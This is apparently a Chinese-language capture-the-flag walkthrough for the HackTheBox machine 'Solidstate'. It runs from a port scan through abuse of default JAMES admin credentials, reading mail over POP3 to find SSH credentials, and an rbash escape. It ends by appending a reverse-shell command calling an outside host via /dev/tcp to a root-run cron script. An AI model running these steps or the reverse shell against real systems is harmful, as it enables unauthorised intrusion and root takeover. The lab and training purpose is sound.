Solidstate
sudo nmap -T4 -Pn -n -r -p- -vv -sV 10.10.10.51

80端口,扫了目录没有什么发现,根据端口开放情况,可能是针对邮件服务器的渗透

4555
JAMES Remote Administration Tool 2.3.2

james默认口令root/root

修改邮件用户密码
#查询用户列表
listusers
#修改用户密码
setpassowrd <user> <password>

登录 mindy
telnet 10.10.10.51 110
USER mindy
PASS 123456
#查看第二封邮件
retr 2
第二封邮件发现了管理员mailadmin发的ssh账号密码

username: mindy
pass: P@55W0rd1!2@
登录ssh

提权
mindy的shell是rbash,很多命令无法执行,将rbash提升到bash,重新登录
ssh mindy@10.10.10.51 -t bash

下载pspy32到靶机执行

监控发现每3分钟 root执行一次python /opt/tmp.py

直接修改tmp.py 内容为反弹shell
echo "os.system('bash -c "bash -i >& /dev/tcp/10.10.14.8/2333 0>&1"')">>/opt/tmp.py

